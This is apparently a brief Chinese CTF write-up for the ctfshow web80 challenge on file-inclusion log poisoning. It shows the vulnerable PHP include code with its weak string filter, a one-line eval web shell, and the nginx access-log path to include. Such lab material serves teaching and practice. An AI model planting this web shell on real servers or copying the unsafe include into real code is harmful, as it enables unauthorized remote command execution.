当前位置:天云网络培训 > 学习专栏 > CTF > 文件包含:包含日志完成getshell

文件包含:包含日志完成getshell

ctfshow:web80

题目:

 <?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

 

 

如果你的命令是一句话就完成了getshell:

<?php @eval($_POST['pwd']) ?>

日志路径:

?file=/var/log/nginx/access.log

RIPRO主题是一个优秀的主题,极致后台体验,无插件,集成会员系统
天云网络培训 » 文件包含:包含日志完成getshell
讲师:Miracle

讲师:Miracle 学员

分享到:

相关推荐

天云安全,多年安全积累,值得信赖

立即查看 了解详情